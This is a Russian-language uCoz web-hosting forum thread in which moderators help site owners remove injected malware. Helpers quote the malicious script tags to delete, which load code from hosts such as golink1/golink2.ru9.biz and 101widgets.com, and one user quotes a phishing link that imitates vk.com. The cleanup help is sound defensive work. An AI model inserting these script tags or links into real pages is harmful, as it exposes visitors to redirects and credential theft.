Модератор форума: Yuri_G  
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    AndruFrol
    Сообщений: 9
    Репутация: 0

    Сообщение # 481 | 19:55:18
    Добрый вечер!
    Интернет магазин Рюкзачок http://ryukzachokshop.ru/
    При просмотре сайта с андроид устройства вместо перехода на страницы сайта по вкладкам "О магазине", "Оплата и доставка", "Обмен и возврат", "Регистрация" происходит переадресация на сайт для обновления браузера brusonline.net
    Если зайти с компьютера (Vista, Браузер Chrome), то вкладка "Регистрация" переадресовывает на страницу вконтакте с предупреждением о блокировки аккаунта ( http://vk.com.feed.14.7219829.ru/?v=yPaE0eWAyodZn6nbgIzdmYpSmafel4jal4hp%3D ) . Остальные вкладки работают нормально.

    Происходит и под гостем и под админом
    Антивирус не реагирует

    Спасибо за помощь!
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 482 | 20:02:47
    AndruFrol, панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставляем скрипт

    Код
    <script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script>
    - поле на что заменить оставляем пустым и производим замену во всех модулях
    после очистки меняем пароль uID профиля. инструкция по замене пароля тут //forum.ucoz.ru/forum/45-52299-1

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    nataliVL
    Сообщений: 18
    Репутация: 0

    Сообщение # 483 | 14:18:27
    Здравствуйте!Помогите пожалуйста!У меня сайт,сайт школы перестал нормально работать. Исчезли некоторые фотографии, вместо них пустые рамочки, а также непонятные ссылки.Что надо делать? и еще непонятные люди пишут комментарии на англ.языке, в день таких приходит около 20 комментарий. Что с этим делать?Заранее благодарна
    bandjuk
    Сообщений: 6816
    Репутация: 2398
    Уровень замечаний:

    Сообщение # 484 | 14:28:20
    nataliVL, 1. Картинки заливайте только на свой сайт, на других сайтах и просто могут удалить.
    2.
    Цитата (nataliVL)
    и еще непонятные люди пишут комментарии на англ.языке, в день таких приходит около 20 комментарий.

    обычный спам, запретите гостям комментарии, или поставьте сложную капчу.
    Главное! блок "Годинник" удаляйте скрипт:
    <script language="JavaScript" src="http://101widgets.com/03025111/180/180"></script>
    блок "До 1 вересня..."
    <script language="JavaScript" src="http://101widgets.com/0000021b/170/230"></script>
    и не ставьте всякую гадость с других сайтов
    oxy_sev
    Сообщений: 11
    Репутация: 0

    Сообщение # 485 | 17:07:50
    Добрый день! Помогите, у меня на сайте какие-то проблемы
    в гостевой книге - http://mebelvam.at.ua/gb
    и обратной связи - http://mebelvam.at.ua/index/0-3
    Как с этим бороться???
    bandjuk
    Сообщений: 6816
    Репутация: 2398
    Уровень замечаний:

    Сообщение # 486 | 17:15:47
    oxy_sev, воспользуйтесь быстрой заменой и удалите скрипты:
    <script language="javascript" src="./js.php?s=50"></script>
    <script language="javascript" src="./js.php?s=54"></script>
    <script language="javascript" src="./js.php?s=54"></script>
    <script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script>
    <script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script>
    <script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script>

    И смените уид пароль. инструкция тут //forum.ucoz.ru/forum/45-52299-1
    oxy_sev
    Сообщений: 11
    Репутация: 0

    Сообщение # 487 | 17:16:49
    А быстрая замена это что?
    bandjuk
    Сообщений: 6816
    Репутация: 2398
    Уровень замечаний:

    Сообщение # 488 | 17:17:56
    oxy_sev
    Сообщений: 11
    Репутация: 0

    Сообщение # 489 | 17:25:19
    Получилось произвести замену 1-го и 4-го скрипта, остальное не нашел... Надо еще что-то сделать?
    bandjuk
    Сообщений: 6816
    Репутация: 2398
    Уровень замечаний:

    Сообщение # 490 | 17:27:31
    oxy_sev, странно, прийдётся Вам вручную искать в шаблонах эти скрипты
    oxy_sev
    Сообщений: 11
    Репутация: 0

    Сообщение # 491 | 17:27:54
    Обратная связь заработала и глюки с гостевой книги вроде ушли. БЛАГОДАРЮ!!!! smile
    Это все шаблоны страниц надо проверить?
    Сообщение отредактировал oxy_sev - Суббота, 17 Авг 2013, 17:29:09
    bandjuk
    Сообщений: 6816
    Репутация: 2398
    Уровень замечаний:

    Сообщение # 492 | 17:32:14
    Цитата (oxy_sev)
    Обратная связь заработала и глюки с гостевой книги вроде ушли.

    в обратной связи осталось это:
    <script language="javascript" src="./js.php?s=54"></script><script language="javascript" src="./js.php?s=54"></script>
    Цитата (oxy_sev)
    Это все шаблоны страниц надо проверить?

    всё-таки быстрая замена должна сработать пробуйте.
    И обязательно поменяйте пароль
    oxy_sev
    Сообщений: 11
    Репутация: 0

    Сообщение # 493 | 17:42:34
    <script language="javascript" src="./js.php?s=54"></script> - вот это со второго раза нашел и заменил, а вторую половину почему-то нет... (
    Буду еще пробовать и пароль поменяю.
    Благодарю!
    bandjuk
    Сообщений: 6816
    Репутация: 2398
    Уровень замечаний:

    Сообщение # 494 | 17:59:06
    Цитата (oxy_sev)
    а вторую половину почему-то нет... (

    так они вроде как одинаковые )
    Уже чисто, по крайней мере на указанных страницах ничего нет
    oxy_sev
    Сообщений: 11
    Репутация: 0

    Сообщение # 495 | 18:03:33
    Упс, точно одинаковые... Это я в режиме паники становлюсь невнимательной :))) Благодарю за быструю помощь!!!
    теперь на душе стало легче....
    Поиск: